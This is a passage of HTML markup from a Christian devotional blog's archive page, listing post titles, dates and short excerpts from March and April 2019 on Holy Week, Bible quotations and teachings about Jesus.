href="https://quotesthoughtsrandom.wordpress.com/2019/04/16/mark-this-unless-you-accept-gods-kingdom-in-the-simplicity-of-a-child-youll-never-get-in-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15022 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16636" class="post-16636 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-holy-monday tag-holy-week tag-john-12 tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/15/here-we-go-its-holy-monday/" rel="bookmark">Here we go &#8212; It&#8217;s Holy&nbsp;Monday</a></h1> </header> <span>April 15, 2019</span> <p>In the timeline of Passion week, it is a little unclear where to place the story of the Greeks seeking &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/15/here-we-go-its-holy-monday/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16636 --> <article id="post-15018" class="post-15018 post type-post status-publish format-standard hentry category-god-thoughts tag-city-of-god tag-hebrews-13 tag-jesus tag-king-jesus tag-will-of-god"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/15/so-lets-go-outside-where-jesus-is-where-the-action-is-not-trying-to-be-privileged-insiders-but-taking-our-share-in-the-abuse-of-jesus-author-of-hebrews/" rel="bookmark">&#8220;So let’s go outside, where Jesus is, where the action is — not trying to be privileged insiders but taking our share in the abuse of Jesus.&#8221; ~Author of&nbsp;Hebrews</a></h1> </header> <span>April 15, 2019</span> <p>Jesus died outside the city of Jerusalem. I am called to go where Jesus is and die with Him on &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/15/so-lets-go-outside-where-jesus-is-where-the-action-is-not-trying-to-be-privileged-insiders-but-taking-our-share-in-the-abuse-of-jesus-author-of-hebrews/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15018 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16633" class="post-16633 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-hosanna tag-jesus tag-john-12 tag-palm-branches tag-palm-sunday"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/14/hosanna-blessed-is-he-who-comes-in-gods-name-yes-the-king-of-israel-the-jerusalem-crowds/" rel="bookmark">&#8220;Hosanna! Blessed is he who comes in God’s name! Yes! The King of Israel!&#8221; ~The Jerusalem&nbsp;crowds</a></h1> </header> <span>April 14, 2019</span> <p>Jesus was performing many signs and wonders. The raising of Lazarus from the dead capped it off. Six days before &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/14/hosanna-blessed-is-he-who-comes-in-gods-name-yes-the-king-of-israel-the-jerusalem-crowds/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16633 --> <article id="post-15016" class="post-15016 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-1-corinthians-15 tag-apostle-paul-sayings tag-jesus tag-king-jesus"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/14/for-he-must-reign-until-he-has-put-all-his-enemies-under-his-feet-the-last-enemy-that-will-be-abolished-is-death-apostle-paul/" rel="bookmark">&#8220;For He must reign until He has put all His enemies under His feet. The last enemy that will be abolished is death.&#8221; ~Apostle&nbsp;Paul</a></h1> </header> <span>April 14, 2019</span> <p>Jesus is first in my life. Jesus is preeminent. Jesus comes before anything else. Let it be so! So, I &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/14/for-he-must-reign-until-he-has-put-all-his-enemies-under-his-feet-the-last-enemy-that-will-be-abolished-is-death-apostle-paul/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15016 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16526" class="post-16526 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-family tag-gods-goal tag-jesus tag-marriage tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/13/is-marriage-a-part-of-gods-plan-for-the-human-race-from-creation/" rel="bookmark">Is marriage a part of God’s plan for the human race from&nbsp;creation?</a></h1> </header> <span>April 13, 2019</span> <p>I am married. That is good news. It is a part of God’s plan for me. I have been able &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/13/is-marriage-a-part-of-gods-plan-for-the-human-race-from-creation/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16526 --> <article id="post-15012" class="post-15012 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-king-jesus tag-kingdom-of-god tag-revelation-11 tag-satan tag-victory"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/13/the-kingdom-of-the-world-has-become-the-kingdom-of-our-master-and-of-his-the-messiah-and-he-will-reign-forever-and-ever-seventh-angel-and-chorus-from-heaven/" rel="bookmark">“The kingdom of the world has become the kingdom of our Master and of His Messiah; and He will reign forever and ever.” ~Seventh Angel and Chorus from&nbsp;Heaven</a></h1> </header> <span>April 13, 2019</span> <p>Kings came and went. Kings died. Someone else became King. It could have been a son. It could have been &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/13/the-kingdom-of-the-world-has-become-the-kingdom-of-our-master-and-of-his-the-messiah-and-he-will-reign-forever-and-ever-seventh-angel-and-chorus-from-heaven/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15012 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16504" class="post-16504 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-jesus tag-son-of-god tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/12/do-others-affirm-jesus-the-messiah-is-gods-son/" rel="bookmark">Do others affirm Jesus the Messiah is God’s&nbsp;Son?</a></h1> </header> <span>April 12, 2019</span> <p>Jesus is the very Son of God. Like all of us who follow Jesus, I must confess that. It is &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/12/do-others-affirm-jesus-the-messiah-is-gods-son/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16504 --> <article id="post-15009" class="post-15009 post type-post status-publish format-standard hentry category-god-is-god category-god-thoughts tag-apostasy tag-atheism tag-atheist tag-death tag-king-solomon tag-murder tag-proverbs-1 tag-wisdom tag-wise-sayings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/12/carelessness-kills-complacency-is-murder-king-solomon/" rel="bookmark">&#8220;Carelessness kills; complacency is murder.&#8221; ~King&nbsp;Solomon</a></h1> </header> <span>April 12, 2019</span> <p>I have to guard against being content. Being self-satisfied is dangerous. Neglecting wisdom in my life leads to the destruction &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/12/carelessness-kills-complacency-is-murder-king-solomon/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15009 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16493" class="post-16493 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-good-shepherd tag-shepherd tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/11/what-are-the-good-shepherds-roles-and-routines/" rel="bookmark">What are the Good Shepherd’s roles and&nbsp;routines?</a></h1> </header> <span>April 11, 2019</span> <p>I want to understand Jesus. I want to fully know Him. I can know more by understanding the roles and &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/11/what-are-the-good-shepherds-roles-and-routines/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16493 --> <article id="post-15004" class="post-15004 post type-post status-publish format-standard hentry category-god-thoughts tag-apostle-paul-sayings tag-fruit-of-the-the-holy-spirit tag-galatians-5 tag-philippians-2 tag-self-control"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/11/the-fruit-of-the-spirit-is-self-control-apostle-paul/" rel="bookmark">&#8220;The fruit of the Spirit is self-control.&#8221; ~Apostle&nbsp;Paul</a></h1> </header> <span>April 11, 2019</span> <p>The last characteristic listed in Galatians 5:22-23 as a fruit of the Spirit is self-control. The fruit of the Spirit &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/11/the-fruit-of-the-spirit-is-self-control-apostle-paul/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-15004 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16484" class="post-16484 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-glory tag-jesus tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/10/does-jesus-the-messiah-bring-glory-to-his-father/" rel="bookmark">Does Jesus the Messiah bring glory to his&nbsp;Father?</a></h1> </header> <span>April 10, 2019</span> <p>Jesus brings glory to His Father. Jesus shows me how stunning and amazing God is. There is no one like &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/10/does-jesus-the-messiah-bring-glory-to-his-father/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16484 --> <article id="post-14996" class="post-14996 post type-post status-publish format-standard hentry category-god-thoughts tag-betray tag-jesus tag-judas tag-life tag-matthew-27 tag-religious-elites tag-remorse tag-repent tag-restore"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/10/ive-sinned-ive-betrayed-an-innocent-man-judas/" rel="bookmark">“I’ve sinned. I’ve betrayed an innocent man.”&nbsp;~Judas</a></h1> </header> <span>April 10, 2019</span> <p>Jesus has been arrested. He has been tried by the religious elites. Judas changes his mind and tries to undo &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/10/ive-sinned-ive-betrayed-an-innocent-man-judas/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14996 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16476" class="post-16476 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-authority tag-prophecy tag-prophet tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/09/what-are-examples-of-jesus-as-a-prophet-who-speaks-with-authority/" rel="bookmark">What are examples of Jesus as a prophet who speaks with&nbsp;authority?</a></h1> </header> <span>April 9, 2019</span> <p>I must recognize that Jesus is the Messiah and the prophet of God. Jesus speaks to me with authority. The &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/09/what-are-examples-of-jesus-as-a-prophet-who-speaks-with-authority/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16476 --> <article id="post-14994" class="post-14994 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-god-is-good tag-isaiah-54 tag-love tag-loving-kindness"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/09/my-loving-kindness-will-not-be-removed-from-you-and-my-agreement-of-peace-will-not-be-shaken-god-through-isaiah/" rel="bookmark">&#8220;My loving kindness will not be removed from you, and My agreement of peace will not be shaken.&#8221; ~God through&nbsp;Isaiah</a></h1> </header> <span>April 9, 2019</span> <p>Somehow, we have this image of God, from the Old Testament, as an angry old man. Grumpy to the core. &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/09/my-loving-kindness-will-not-be-removed-from-you-and-my-agreement-of-peace-will-not-be-shaken-god-through-isaiah/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14994 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16467" class="post-16467 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-agnosticism tag-atheism tag-teachings tag-unbelievers"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/08/atheism/" rel="bookmark">Why do atheists refuse to believe in&nbsp;God?</a></h1> </header> <span>April 8, 2019</span> <p>It isn’t that atheists, agnostics and unbelievers don’t know God exists. They do. There is plenty of evidence that they &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/08/atheism/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16467 --> <article id="post-14992" class="post-14992 post type-post status-publish format-standard hentry category-god-thoughts category-gods-goal tag-1-corinthians-5 tag-church tag-disciples tag-discipline tag-matthew-18"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/08/if-your-brother-sins-go-and-show-him-his-fault-in-private-jesus/" rel="bookmark">&#8220;If your brother sins, go and show him his fault in private.&#8221;&nbsp;~Jesus</a></h1> </header> <span>April 8, 2019</span> <p>There was a pastor who became involved immorally with a married woman in his congregation. They each divorced their respective &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/08/if-your-brother-sins-go-and-show-him-his-fault-in-private-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14992 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16460" class="post-16460 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-bold tag-confidence tag-courage tag-fear tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/07/can-we-have-courage-in-our-prayers/" rel="bookmark">Can we have courage in our&nbsp;prayers?</a></h1> </header> <span>April 7, 2019</span> <p>Am I ready to be bold and have confidence when I approach Jesus in prayer? Jesus is my great high &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/07/can-we-have-courage-in-our-prayers/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16460 --> <article id="post-14983" class="post-14983 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-bread tag-bread-of-life tag-disciples tag-faith tag-jesus tag-mark-6 tag-miracle"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/07/are-you-serious-disciples-to-jesus/" rel="bookmark">&#8220;Are you serious?&#8221; ~Disciples to&nbsp;Jesus</a></h1> </header> <span>April 7, 2019</span> <p>Jesus asks me to do something. It seems outrageous. It seems impossible. Are you serious, I ask? Seriously, you want &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/07/are-you-serious-disciples-to-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14983 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16450" class="post-16450 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-cross tag-crucifixion tag-exaltation tag-jesus tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/06/why-was-jesus-the-messiah-exalted-on-the-cross/" rel="bookmark">Why was Jesus the Messiah exalted on the&nbsp;cross?</a></h1> </header> <span>April 6, 2019</span> <p>I see Jesus. He is lifted up on the cross. It is not a pleasant thing to see. He is &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/06/why-was-jesus-the-messiah-exalted-on-the-cross/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16450 --> <article id="post-14981" class="post-14981 post type-post status-publish format-standard hentry category-god-thoughts category-gods-goal tag-cross tag-focus tag-goal tag-gods-goal tag-happy tag-hebrews-12 tag-jesus tag-joy tag-maturity tag-shame tag-throne"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/06/looking-away-from-all-that-will-distract-us-and-focusing-our-eyes-on-jesus-the-one-who-brings-our-faith-to-maturity-who-for-the-joy-of-accomplishing-the-goal-set-before-him-endured-the-cross-a/" rel="bookmark">&#8220;Looking away from all that will distract us and focusing our eyes on Jesus, the One who brings our faith to maturity, who for the joy of accomplishing the goal set before Him endured the cross.&#8221; ~Author of&nbsp;Hebrews</a></h1> </header> <span>April 6, 2019</span> <p>I want joy in my life. I can have it by focusing on Jesus. Jesus brings my faith to completion &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/06/looking-away-from-all-that-will-distract-us-and-focusing-our-eyes-on-jesus-the-one-who-brings-our-faith-to-maturity-who-for-the-joy-of-accomplishing-the-goal-set-before-him-endured-the-cross-a/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14981 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16445" class="post-16445 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-ecstasy tag-jesus tag-joy tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/05/can-we-experience-a-future-ecstasy-in-response-to-gods-coming-kingdom/" rel="bookmark">Can we experience a future ecstasy in response to God’s coming&nbsp;kingdom?</a></h1> </header> <span>April 5, 2019</span> <p>We seem a little reluctant to talk about the ecstatic experience. Is that for mystics and weirdo’s, I think? I &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/05/can-we-experience-a-future-ecstasy-in-response-to-gods-coming-kingdom/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16445 --> <article id="post-14975" class="post-14975 post type-post status-publish format-standard hentry category-god-thoughts category-gods-goal tag-baptism tag-born-again tag-holy-spirit tag-jesus tag-jesus-sayings tag-john-3 tag-kingdom-of-god tag-life"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/05/youre-not-listening-let-me-say-it-again-jesus/" rel="bookmark">&#8220;You’re not listening. Let me say it again.&#8221;&nbsp;~Jesus</a></h1> </header> <span>April 5, 2019</span> <p>I am like Nicodemus. Jesus wants me to understand something but I&#8217;m not quite getting it. Jesus is patient. Jesus &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/05/youre-not-listening-let-me-say-it-again-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14975 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16438" class="post-16438 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-jesus tag-lord tag-master-jesus tag-matthew-10 tag-slave tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/04/as-a-slave-am-i-above-my-master-jesus/" rel="bookmark">As a slave, am I above my Master&nbsp;Jesus?</a></h1> </header> <span>April 4, 2019</span> <p>Am I a servant or am I a slave? I am both. It isn’t an “either/or” issue. I am afraid; &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/04/as-a-slave-am-i-above-my-master-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16438 --> <article id="post-14973" class="post-14973 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-evil tag-evil-one tag-jesus tag-jesus-sayings tag-john-17 tag-sanctify tag-truth"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/04/for-their-sakes-i-sanctify-set-apart-myself-that-they-themselves-also-may-be-sanctified-set-apart-in-truth-jesus/" rel="bookmark">&#8220;For their sakes I sanctify (set apart) Myself, that they themselves also may be sanctified (set apart) in truth.&#8221;&nbsp;~Jesus</a></h1> </header> <span>April 4, 2019</span> <p>I avoid some things because they sound very geeky and smack of theology. Jesus talks about sanctification. Maybe I need &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/04/for-their-sakes-i-sanctify-set-apart-myself-that-they-themselves-also-may-be-sanctified-set-apart-in-truth-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14973 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16432" class="post-16432 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-lamb-of-god tag-sin tag-teachings tag-worthy"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/03/is-jesus-the-lamb-worthy/" rel="bookmark">Is Jesus the Lamb&nbsp;worthy?</a></h1> </header> <span>April 3, 2019</span> <p>I must say with a loud voice, worthy is the lamb Jesus who was slain for me. I must sing &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/03/is-jesus-the-lamb-worthy/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16432 --> <article id="post-14964" class="post-14964 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts category-gods-goal tag-apostle-paul-sayings tag-evil tag-galatians-1 tag-glory tag-grace tag-peace"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/03/jesus-gave-himself-for-our-sins-to-rescue-us-from-this-present-evil-age-according-to-the-will-of-our-god-and-father-apostle-paul/" rel="bookmark">&#8220;Jesus gave himself for our sins to rescue us from this present evil age, according to the will of our God and Father.&#8221; ~Apostle&nbsp;Paul</a></h1> </header> <span>April 3, 2019</span> <p>What is the good news message that Paul has for me? Jesus the Messiah gave himself for my missing God’s &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/03/jesus-gave-himself-for-our-sins-to-rescue-us-from-this-present-evil-age-according-to-the-will-of-our-god-and-father-apostle-paul/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14964 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16421" class="post-16421 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-baptism tag-john-the-baptizer tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/02/what-was-the-baptism-by-john-all-about-how-does-it-differ-from-baptism-today/" rel="bookmark">What was the baptism by John all about? How does it differ from baptism&nbsp;today?</a></h1> </header> <span>April 2, 2019</span> <p>I came to Jesus and decided to follow Him at the age of 12. I was immediately baptized in water. &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/02/what-was-the-baptism-by-john-all-about-how-does-it-differ-from-baptism-today/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16421 --> <article id="post-14959" class="post-14959 post type-post status-publish format-standard hentry category-gods-goal tag-1-timothy-5 tag-apostle-paul-sayings tag-elderly tag-gods-goal tag-old-age tag-respect"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/02/do-not-sharply-rebuke-an-older-man-but-rather-appeal-to-him-as-a-father-apostle-paul/" rel="bookmark">&#8220;Do not sharply rebuke an older man, but rather appeal to him as a father.&#8221; ~Apostle&nbsp;Paul</a></h1> </header> <span>April 2, 2019</span> <p>Old age is generally held in honor and the aged in society are to be respected. Because of the wisdom &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/02/do-not-sharply-rebuke-an-older-man-but-rather-appeal-to-him-as-a-father-apostle-paul/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14959 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16419" class="post-16419 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-blame tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/01/how-should-we-deal-with-those-who-deserve-blame/" rel="bookmark">How should we deal with those who deserve&nbsp;blame?</a></h1> </header> <span>April 1, 2019</span> <p>We all miss God’s goal for our lives. I certainly do. Sometimes that is obvious to other brothers and sisters &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/01/how-should-we-deal-with-those-who-deserve-blame/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16419 --> <article id="post-14950" class="post-14950 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-delight tag-gift tag-good-news tag-jesus tag-love tag-psalm-44 tag-smile tag-victory tag-wise-sayings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/01/we-didnt-fight-for-this-land-we-didnt-work-for-it-it-was-a-gift-you-gave-it-smiling-as-you-gave-it-delighting-as-you-gave-it-unknown-psalmist/" rel="bookmark">&#8220;We didn’t fight for this land; we didn’t work for it — it was a gift! You gave it, smiling as you gave it, delighting as you gave it.&#8221; ~ Unknown&nbsp;Psalmist</a></h1> </header> <span>April 1, 2019</span> <p>Jesus is smiling. He takes great pleasure in giving me freedom. My life is a gift from God. I didn&#8217;t earn &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/04/01/we-didnt-fight-for-this-land-we-didnt-work-for-it-it-was-a-gift-you-gave-it-smiling-as-you-gave-it-delighting-as-you-gave-it-unknown-psalmist/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14950 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16410" class="post-16410 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-repent tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/31/is-god-patient-with-the-unrepentant/" rel="bookmark">Is God patient with the&nbsp;unrepentant?</a></h1> </header> <span>March 31, 2019</span> <p>I am so thankful that God is patient with me. God gives me every opportunity to radically change my mind &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/31/is-god-patient-with-the-unrepentant/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16410 --> <article id="post-14946" class="post-14946 post type-post status-publish format-standard hentry category-god-is-good category-god-thoughts tag-adoption tag-apostle-paul-sayings tag-children-of-god tag-family tag-galatians-4"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/31/because-you-are-sons-god-has-sent-forth-the-spirit-of-his-son-into-our-hearts-apostle-paul/" rel="bookmark">&#8220;Because you are sons, God has sent forth the Spirit of His Son into our hearts.&#8221; ~Apostle&nbsp;Paul</a></h1> </header> <span>March 31, 2019</span> <p>I am so glad that God has adopted me. Jesus has broken the bondage of slavery and given my His &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/31/because-you-are-sons-god-has-sent-forth-the-spirit-of-his-son-into-our-hearts-apostle-paul/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14946 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16402" class="post-16402 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-defiance tag-hell tag-sin tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/30/if-i-continue-missing-gods-goal-willfully-will-i-go-to-hell/" rel="bookmark">If I continue missing God’s goal willfully, will I go to&nbsp;hell?</a></h1> </header> <span>March 30, 2019</span> <p>I need to be very careful. God loves me but God has expectations. What can I expect if I know &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/30/if-i-continue-missing-gods-goal-willfully-will-i-go-to-hell/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16402 --> <article id="post-14942" class="post-14942 post type-post status-publish format-standard hentry category-personal-thoughts tag-freedom tag-jesus tag-laws tag-personal-thoughts tag-rules tag-son-of-god"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/30/i-had-to-quit-being-a-rule-man-to-become-gods-man/" rel="bookmark">I had to quit being a &#8220;rule man&#8221; to become God&#8217;s&nbsp;man.</a></h1> </header> <span>March 30, 2019</span> <p>I&#8217;ve tried to please God by keeping the rules and working my head off. Really, I&#8217;ve tried hard. Rule keeping &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/30/i-had-to-quit-being-a-rule-man-to-become-gods-man/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14942 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16392" class="post-16392 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-patience tag-perseverance tag-preach tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/29/how-should-we-exercise-patience-in-communicating-the-good-news-message-of-jesus/" rel="bookmark">How should we exercise patience in communicating the good news message of&nbsp;Jesus?</a></h1> </header> <span>March 29, 2019</span> <p>It is easy to get frustrated some days. I believe I am proclaiming the message of Jesus. Not everyone is &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/29/how-should-we-exercise-patience-in-communicating-the-good-news-message-of-jesus/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16392 --> <article id="post-14940" class="post-14940 post type-post status-publish format-standard hentry category-god-thoughts category-gods-goal tag-1-peter-5 tag-apostle-peter-sayings tag-humble tag-humility"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/29/all-of-you-clothe-yourselves-with-humility-toward-one-another-apostle-peter/" rel="bookmark">&#8220;All of you, clothe yourselves with humility toward one another.&#8221; ~Apostle&nbsp;Peter</a></h1> </header> <span>March 29, 2019</span> <p>I want grace in my life. I imagine you do as well. Peter gives us the key. The road to &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/29/all-of-you-clothe-yourselves-with-humility-toward-one-another-apostle-peter/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-14940 --> </div><!-- end clear-fix --><div class="clear-fix"><article id="post-16383" class="post-16383 post type-post status-publish format-standard hentry category-god-thoughts category-teachings tag-anger tag-disgust tag-religious-elites tag-teachings"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/28/does-jesus-get-angry-with-petty-legalism-in-religious-observance/" rel="bookmark">Does Jesus get angry with petty legalism in religious&nbsp;observance?</a></h1> </header> <span>March 28, 2019</span> <p>I need to be careful. It is way too easy to fall into the religious rule and legalism trap. The &hellip;</p> <p><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/28/does-jesus-get-angry-with-petty-legalism-in-religious-observance/">Continue reading <span class="meta-nav">&rarr;</span></a></p> </article><!-- #post-16383 --> <article id="post-14932" class="post-14932 post type-post status-publish format-standard hentry category-god-thoughts category-gods-goal tag-forgive tag-jesus tag-jesus-sayings tag-love tag-luke-17 tag-sin"> <header> <h1><a href="https://quotesthoughtsrandom.wordpress.com/2019/03/28/be-alert-if-you-see-your-friend-going-wrong-correct-him-jesus/" rel="bookmark">“Be alert. If you see your friend going wrong, correct him.&#8221;&nbsp;~Jesus</a></h1> </header> 